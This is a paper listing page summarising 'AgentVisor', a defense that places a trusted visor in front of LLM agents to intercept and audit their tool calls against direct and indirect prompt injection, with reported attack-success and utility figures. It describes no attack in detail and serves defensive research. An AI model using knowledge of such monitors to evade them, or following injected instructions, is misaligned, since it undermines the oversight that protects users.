AgentVisor: Defending LLM Agents Against Prompt Injection via Semantic Virtualization

Zonghao Ying; Haozheng Wang; Jiangfan Liu; Quanchen Zou; Aishan Liu; Jian Yang; Yaodong Yang; Xianglong Liu

arXiv:2604.24118·cs.CR·April 28, 2026

AgentVisor: Defending LLM Agents Against Prompt Injection via Semantic Virtualization

Zonghao Ying, Haozheng Wang, Jiangfan Liu, Quanchen Zou, Aishan Liu, Jian Yang, Yaodong Yang, Xianglong Liu

PDF

TL;DR

AgentVisor is a novel framework inspired by OS virtualization that enforces semantic privilege separation to defend LLM agents against prompt injection attacks, balancing security and utility effectively.

Contribution

It introduces a semantic privilege separation approach with an audit protocol and self-correction mechanism, significantly reducing attack success while maintaining high utility.

Findings

01

Attack success rate reduced to 0.65%

02

Utility decreased by only 1.45% compared to no defense

03

Outperforms existing defense methods in security and utility balance

Abstract

Large Language Model (LLM) agents are increasingly used to automate complex workflows, but integrating untrusted external data with privileged execution exposes them to severe security risks, particularly direct and indirect prompt injection. Existing defenses face significant challenges in balancing security with utility, often encountering a trade-off where rigorous protection leads to over-defense, or where subtle indirect injections bypass detection. Drawing inspiration from operating system virtualization, we propose AgentVisor, a novel defense framework that enforces semantic privilege separation. AgentVisor treats the target agent as an untrusted guest and intercepts tool calls via a trusted semantic visor. Central to our approach is a rigorous audit protocol grounded in classic OS security primitives, designed to systematically mitigate both direct and indirect injection…

Peer Reviews

No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.

Videos

No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.